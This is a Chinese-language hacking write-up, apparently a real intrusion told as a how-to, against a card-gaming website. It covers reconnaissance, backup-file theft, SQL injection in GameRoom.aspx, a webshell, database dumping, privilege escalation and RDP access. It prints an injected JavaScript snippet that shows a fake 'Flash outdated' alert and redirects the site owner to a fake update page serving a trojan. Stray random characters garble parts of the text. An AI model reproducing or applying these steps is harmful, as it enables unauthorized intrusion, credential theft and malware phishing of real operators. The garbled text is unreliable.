背景
image.png
背景簡單信息收集
image.png
外網(wǎng)開放了兩個web系統(tǒng),80端口302跳轉到app下載站,暫不考慮
9999端口:
image.png
.net+sqlserver+windows
將這個系統(tǒng)放到fofa上搜搜使用同一套系統(tǒng)的ip
image.png
PS:兄弟萌答應我下次fofa截圖一定要把Content-Length: xxxx 打碼好嗎咱士,每次都通過這個方式爆菊屢試不爽。
將這40多個站脫下來 批量掃一波備份先
image.png
拿到備份源碼
image.png
api = 接口文件源碼
Aw_Manager = 后臺管理系統(tǒng)源碼
經(jīng)過長達五分鐘的讀代碼榛鼎,發(fā)現(xiàn)其api文件夾的GameRoom.aspx文件下的Page_Load方法存在一處sql注入
image.png
image.png
注入上線
image.png
脫庫進后臺
image.png
問題不大 利用注入寫的shell執(zhí)行update語句
image.png
進后臺
image.png
各種玩法看的我眼花繚亂
image.png
登錄后臺 900+玩家 均為微信登錄的該棋牌游戲
image.png
網(wǎng)站搭建者ip歸屬上海松江區(qū)(電信) 判斷是家庭路由器外網(wǎng)ip 無溯源價值
登錄RDP
爛土豆提權+通過注冊表查詢rdp端口被更改為39456
image.png
RDP登上去
image.png
flash釣魚
在后臺登陸成功后跳轉的文件插入跳轉js 跳轉到事先準備好的假的flash更新頁面
事先準備:免殺馬一只 flash假域名一個(最好是包含有"flash"的字樣)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本過低乞封,請嘗試升級后訪問改頁面!");window.location.;</script>
效果:
輸入賬號密碼登錄
image.png
登錄成功 彈框"您的FLASH版本過低,請嘗試升級后訪問改頁面!"蜈首,只能點擊"確定"
image.png
點擊"確認"跳轉到事先偽造的flash更新頁面網(wǎng)站实抡,誘導該棋牌所有者下載點擊
image.png
下載安裝好我這邊隨即上線,取得對方PC控制權欢策,并刪除之前插入的跳轉JS
(后續(xù)如何吆寨,下回分解)
